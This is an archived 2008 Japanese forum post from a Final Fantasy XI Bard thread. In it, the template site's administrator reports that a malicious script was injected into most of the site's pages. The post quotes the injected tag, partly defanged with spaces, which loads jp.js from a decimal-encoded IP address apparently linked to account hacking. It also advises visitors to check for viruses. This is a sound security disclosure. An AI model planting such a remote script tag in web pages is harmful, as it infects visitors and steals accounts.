FFXI BARD

Ads by XREA

詩人スレッドログ倉庫


【吟遊詩人】♪やっと来た新アビ♪【第九十五楽章】

793 名前: 名も無き軍師 投稿日:2008/08/07(木) 22:04:32 ID:+fSzCKWr
○詩人スレ住人の方へ 大切なご連絡です○


かなり久しぶりに書き込みます。>>1のテンプレサイト管理人です。

さきほど気付いたのですが、8月2日23時45分頃〜今まで、
テンプレサイト内のほぼ全ページに、
謎のスクリプトが、仕込まれてしまっていたようです。

仕込まれていたのは、下記のようなものです。
<script src= h t t p : // 1039045744 : 88 / jp.js ></script>
       ↑↑危険かもしれないので、一部スペースを入れ、アクセスできないように書いています。

1039045744で検索すると、どうもアカウントハックを目的とするサイトのようだったので、
慌てて削除をしておきましたが、この期間中にアクセスされた方は、
もしかするとウィルスに感染しているかもしれません。
心当たりのある方は、一度ウィルスチェック等をしていただければと思います。


こんなことが起こるとは思いもよらず、どう対処すればいいのか混乱している状況ですが、
さしあたり、まずは報告をしておくべき、と考え、書き込みさせていただきました。

以上、よろしくお願いします。